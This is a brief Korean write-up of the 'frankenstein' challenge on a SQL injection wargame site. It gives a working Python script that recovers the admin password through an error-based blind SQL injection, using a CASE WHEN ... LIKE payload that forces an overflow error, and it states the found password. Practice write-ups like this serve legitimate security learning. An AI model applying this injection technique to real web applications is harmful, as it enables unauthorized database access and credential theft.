frankenstein

첫 화면이다.

Error-based Blind SQL Injection 문제로 인지하고 풀었다.

파이썬 코드를 짜면 아래와 같다.

import requests
import string

URL = 'https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw='
PHPSESSID = 'MY_PHPSESSID'
TRUE_PHRASE = '<br>error'


def query(payload):
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 0dc4efbb
def find_pw():
    pw = ''
    while True:
        found = False
        for character in string.printable:
            if character in "#%&'_":
                continue
            elif query("' or case when id='admin' and pw like '{}{}%25' then 9999999999*9999999999 else 0 end%23".format(pw, character)) is True:
                pw += character
                found = True
                break
        if found is False:
            break
    print('pw: {}'.format(pw))


find_pw()

실행결과, pw는 0dc4efbb 이다.

https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw=0dc4efbb 에 접속하면 문제가 풀린다.